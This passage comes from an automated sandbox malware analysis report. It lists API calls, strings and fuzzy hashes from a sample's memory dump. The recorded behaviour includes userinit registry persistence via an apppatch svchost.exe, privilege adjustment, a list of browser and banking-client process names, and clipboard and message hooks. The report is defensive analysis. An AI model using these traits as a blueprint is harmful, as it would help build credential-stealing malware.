                                                                                                                                                                                                                      • Part of subcall function 004017F0: HeapAlloc.KERNEL32(00000000), ref: 0040193A
                                                                                                                                                                                                                      • Part of subcall function 004017F0: memset.MSVCRT ref: 0040194A
                                                                                                                                                                                                                      • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401967
                                                                                                                                                                                                                      • Part of subcall function 004017F0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040199B
                                                                                                                                                                                                                      • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,?), ref: 004019AD
                                                                                                                                                                                                                      • Part of subcall function 004017F0: HeapValidate.KERNEL32(00000000), ref: 004019B6
                                                                                                                                                                                                                      • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,?), ref: 004019C2
                                                                                                                                                                                                                      • Part of subcall function 004017F0: HeapFree.KERNEL32(00000000), ref: 004019C5
                                                                                                                                                                                                                      • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019D2
                                                                                                                                                                                                                      • Part of subcall function 004017F0: HeapValidate.KERNEL32(00000000), ref: 004019D5
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 00401EAA
                                                                                                                                                                                                                      • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019DE
                                                                                                                                                                                                                      • Part of subcall function 004017F0: HeapFree.KERNEL32(00000000), ref: 004019E1
                                                                                                                                                                                                                      • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00401E65), ref: 004019F1
                                                                                                                                                                                                                      • Part of subcall function 004017F0: HeapValidate.KERNEL32(00000000), ref: 004019F4
                                                                                                                                                                                                                      • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00401E65), ref: 00401A01
                                                                                                                                                                                                                      • Part of subcall function 004017F0: HeapFree.KERNEL32(00000000), ref: 00401A04
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 00401EEA
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 00401F26
                                                                                                                                                                                                                    • SwitchToThread.KERNEL32(?,?,00404D20,?,?,?), ref: 00401F6F
                                                                                                                                                                                                                    • NetApiBufferFree.NETAPI32(?), ref: 00401F95
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                                    • String ID: %s1$%s12$%s123
                                                                                                                                                                                                                    • API String ID: 1588441251-2882894844
                                                                                                                                                                                                                    • Opcode ID: 63274706b62708f42648d06670bacef668267c51d1314ddcf6f9b5beb05922d2
                                                                                                                                                                                                                    • Instruction ID: d6d119788ade0702c334ba716b850de2f597c51d849c979d1570e7f46e431759
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63274706b62708f42648d06670bacef668267c51d1314ddcf6f9b5beb05922d2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5651B6B25043015BD331DB54C844EEB73A8AFD8754F000A2EFA846B2D1DB78DA48CBA6
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GlobalFindAtomA.KERNEL32(Fri Jun 17 05:52:09 20112,?,?,00402D7C), ref: 004027B9
                                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(Fri Jun 17 05:52:09 20112), ref: 004027CA
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 004027D6
                                                                                                                                                                                                                    • RtlAdjustPrivilege.NTDLL ref: 004027E6
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 004027EC
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                                    • String ID: Fri Jun 17 05:52:09 20112$Pn7w$explorer.exe$winlogon.exe
                                                                                                                                                                                                                    • API String ID: 3001685711-3521715275
                                                                                                                                                                                                                    • Opcode ID: d14c921f1184c696d62da8aac8ded89f8ce8efe24655d3e49b352df140887ec9
                                                                                                                                                                                                                    • Instruction ID: 466661b1ea48edbd92509d7abf6a2a5afa49196c9ec5a44dbf6f5976db38d1d5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d14c921f1184c696d62da8aac8ded89f8ce8efe24655d3e49b352df140887ec9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AF08CB460020566EA5077E1AE0AB6B3A1CAB84B90F104137FF00B72E0EAB8DC0046FC
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00402ED7
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000300,004035BE,7644E610,00402EBE), ref: 00402EEF
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 00402EF2
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000300), ref: 00402EFF
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00402F02
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,004035BE,004035BE,7644E610,00402EBE), ref: 00402F0B
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 00402F0E
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,004035BE), ref: 00402F1B
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00402F1E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2629017576-0
                                                                                                                                                                                                                    • Opcode ID: fff050803a28cdbdb81a85633d3b81f0a42b3d859f4e64ff46b7961ccc31fb95
                                                                                                                                                                                                                    • Instruction ID: 47c24e4de567f4ebe007c7ce519db5101e5d5be497eca443f574c4ff2f4d9865
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fff050803a28cdbdb81a85633d3b81f0a42b3d859f4e64ff46b7961ccc31fb95
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BF0DAB1656211ABEA102BA59E8CF572A6CEF85B82F040525B708F71D0CAB4DC40D67C
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004014D4
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?,76D6DB30), ref: 004014DF
                                                                                                                                                                                                                    • Process32First.KERNEL32 ref: 00401505
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,?), ref: 00401520
                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,?), ref: 0040152C
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401548
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040155A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3955875343-0
                                                                                                                                                                                                                    • Opcode ID: 7873ba4b88183a8641433f701d7857d9c97be643caff6c6a3dfa6b6ea5f2b523
                                                                                                                                                                                                                    • Instruction ID: 35ff206d6e877699644ac5607af1a2cdaefe1b2aeb9dd15ae369335d4f3073ea
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7873ba4b88183a8641433f701d7857d9c97be643caff6c6a3dfa6b6ea5f2b523
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D11C3B25042146BD310DF65DC0899BBBACEBD53A0F00453AFE55A72D0E33499088BEA
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040135A
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A8E,-00000006,00000000), ref: 00401367
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401373
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                                    • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                                    • API String ID: 1545651562-3277137149
                                                                                                                                                                                                                    • Opcode ID: d14c2f9e698ac929ed0932fb87d06ba4f74ade3cc07b29cd2c75e337da446871
                                                                                                                                                                                                                    • Instruction ID: 796e466c09054be0152a46d456eb4211c9760dde1472f6724dae78271da73244
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d14c2f9e698ac929ed0932fb87d06ba4f74ade3cc07b29cd2c75e337da446871
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E80126712003045BC314AB6AAC81696B7DEAB84706341413BEE05F36A2C23AD8048BAC
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004012AB
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A82,00000000), ref: 004012BC
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004012CC
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                                    • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                                    • API String ID: 1545651562-3277137149
                                                                                                                                                                                                                    • Opcode ID: eae13d97ce2cff1767e69285929d2bc7f9bbc3e812787a57d7dc8512338ae20e
                                                                                                                                                                                                                    • Instruction ID: b56d10f3903839679d055e287fe873ff32dc311f96dddc7098b711b9a384a0cf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eae13d97ce2cff1767e69285929d2bc7f9bbc3e812787a57d7dc8512338ae20e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65E04FB07413045BD714BFB6AD09A1637DD9BC47073968036BB09F21E1DA39C814CA6D

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:2.3%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:65%
                                                                                                                                                                                                                    Signature Coverage:26.2%
                                                                                                                                                                                                                    Total number of Nodes:446
                                                                                                                                                                                                                    Total number of Limit Nodes:16
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C73310: IsUserAnAdmin.SHELL32 ref: 02C73335
                                                                                                                                                                                                                      • Part of subcall function 02C73310: GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02C73354
                                                                                                                                                                                                                      • Part of subcall function 02C73310: PathAddBackslashA.SHLWAPI(?), ref: 02C73361
                                                                                                                                                                                                                      • Part of subcall function 02C73310: GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02C7337E
                                                                                                                                                                                                                      • Part of subcall function 02C73310: _snprintf.MSVCRT ref: 02C73399
                                                                                                                                                                                                                      • Part of subcall function 02C73310: RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02C733B7
                                                                                                                                                                                                                      • Part of subcall function 02C73310: RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02C7340C
                                                                                                                                                                                                                      • Part of subcall function 02C73310: RegCloseKey.ADVAPI32(00000000), ref: 02C7341A
                                                                                                                                                                                                                      • Part of subcall function 02C93E40: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02C93E6F
                                                                                                                                                                                                                      • Part of subcall function 02C93E40: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02C93EA8
                                                                                                                                                                                                                      • Part of subcall function 02C93E40: _snprintf.MSVCRT ref: 02C93F13
                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\user\AppData\Roaming\), ref: 02C858B0
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(C:\Users\user\AppData\Roaming\), ref: 02C858BB
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C858CF
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02C858EB
                                                                                                                                                                                                                    • GetCommandLineA.KERNEL32 ref: 02C858F5
                                                                                                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 02C8592D
                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(02CBD888), ref: 02C8595C
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02C85979
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C82140,00000000,00000000,00000000), ref: 02C859B7
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C859CF
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C859E0
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C868B0,00000000,00000000,00000000), ref: 02C85A0F
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C85A27
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85A38
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00016B60,00000000,00000000,00000000), ref: 02C85A4D
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,80F500EBa), ref: 02C85A61
                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(02CBD8A0), ref: 02C85A70
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C864A0,00000000,00000000,00000000), ref: 02C85A84
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C85A94
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85AA5
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C85590,00000000,00000000,00000000), ref: 02C85ABA
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C85ACA
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85ADB
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C842C0,00000000,00000000,00000000), ref: 02C85B05
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C85B19
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85B2A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C85B39
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C85B3C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C85B49
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C85B4C
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C85B70
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02C85B82
                                                                                                                                                                                                                      • Part of subcall function 02C76240: memset.MSVCRT ref: 02C76271
                                                                                                                                                                                                                      • Part of subcall function 02C76240: memset.MSVCRT ref: 02C7628F
                                                                                                                                                                                                                      • Part of subcall function 02C76240: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C762AB
                                                                                                                                                                                                                      • Part of subcall function 02C76240: RegQueryValueExA.KERNEL32(?,80F50759a,00000000,00000001,?,00000104), ref: 02C762D2
                                                                                                                                                                                                                      • Part of subcall function 02C76240: GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02C7634A
                                                                                                                                                                                                                      • Part of subcall function 02C76240: HeapAlloc.KERNEL32(00000000), ref: 02C76351
                                                                                                                                                                                                                      • Part of subcall function 02C76240: memset.MSVCRT ref: 02C76365
                                                                                                                                                                                                                      • Part of subcall function 02C76240: lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02C7637E
                                                                                                                                                                                                                      • Part of subcall function 02C76240: RegCloseKey.ADVAPI32(?), ref: 02C7638C
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 02C85B8E
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C85B9D
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\svchost.exe), ref: 02C85BB9
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\iexplore.exe), ref: 02C85BE0
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\java.exe), ref: 02C85BF6
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\javaw.exe), ref: 02C85C0C
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\javaws.exe), ref: 02C85C22
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\opera.exe), ref: 02C85C38
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\firefox.exe), ref: 02C85C4E
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\maxthon.exe), ref: 02C85C64
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\avant.exe), ref: 02C85C7A
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\mnp.exe), ref: 02C85C90
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\safari.exe), ref: 02C85CA6
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\netscape.exe), ref: 02C85CBC
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\tbb-firefox.exe), ref: 02C85CD2
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02C85CE8
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02C85CFE
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8A300,00000000,00000000,00000000), ref: 02C85D2C
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85D46
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85D53
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8D990,00000000,00000000,00000000), ref: 02C85D68
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85D7C
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85D89
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8EF40,00000000,00000000,00000000), ref: 02C85D9E
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85DB2
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85DBF
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8F770,00000000,00000000,00000000), ref: 02C85DD4
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85DE8
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85DF5
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8E0B0,00000000,00000000,00000000), ref: 02C85E0A
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85E1E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85E2B
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8B580,00000000,00000000,00000000), ref: 02C85E40
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85E54
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85E61
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8B620,00000000,00000000,00000000), ref: 02C85E76
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85E8A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85E97
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8FEE0,00000000,00000000,00000000), ref: 02C85EAC
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85EC0
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85ECD
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C90AF0,00000000,00000000,00000000), ref: 02C85EE2
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85EF6
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85F03
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C917E0,00000000,00000000,00000000), ref: 02C85F18
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85F2C
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85F39
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C918D0,00000000,00000000,00000000), ref: 02C85F4E
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85F62
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85F6F
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8E890,00000000,00000000,00000000), ref: 02C85F84
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85F98
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85FA5
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C91AB0,00000000,00000000,00000000), ref: 02C85FBA
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85FCE
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85FDB
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C92A30,00000000,00000000,00000000), ref: 02C85FF0
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C86004
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C86011
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C92D50,00000000,00000000,00000000), ref: 02C86026
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8603A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C86047
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C902E0,00000000,00000000,00000000), ref: 02C8605C
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C86070
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8607D
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C77110,00000000,00000000,00000000), ref: 02C86092
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C860AA
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C860BF
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\isclient.exe), ref: 02C860D6
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\ipc_full.exe), ref: 02C860EC
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\intpro.exe), ref: 02C860FE
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\cbsmain.dll), ref: 02C86110
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\clmain.exe), ref: 02C86122
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\core.exe), ref: 02C86134
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\rundll32.exe), ref: 02C86146
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\notepad.exe), ref: 02C86158
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: memset.MSVCRT ref: 02C84511
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,7622F550,75AF7390,76230A60), ref: 02C84527
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: AddVectoredExceptionHandler.KERNEL32(00000001,02C73940), ref: 02C84534
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02C8454F
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: CreateThread.KERNEL32(00000000,00000000,Function_00019230,00000000,00000000,00000000), ref: 02C84569
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: GetHandleInformation.KERNEL32(00000000,?), ref: 02C84581
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: CloseHandle.KERNEL32(00000000), ref: 02C84592
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: InitializeCriticalSection.KERNEL32(02CBD870), ref: 02C845A3
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C845B9
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02C845CB
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C845EA
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02C845F8
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02C84614
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02C84630
                                                                                                                                                                                                                      • Part of subcall function 02C76FB0: GetCurrentProcessId.KERNEL32 ref: 02C76FB9
                                                                                                                                                                                                                      • Part of subcall function 02C76FB0: GetCurrentThreadId.KERNEL32 ref: 02C76FC8
                                                                                                                                                                                                                      • Part of subcall function 02C76FB0: GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C76FE1
                                                                                                                                                                                                                      • Part of subcall function 02C76FB0: GetUserObjectInformationA.USER32(00000000), ref: 02C76FE8
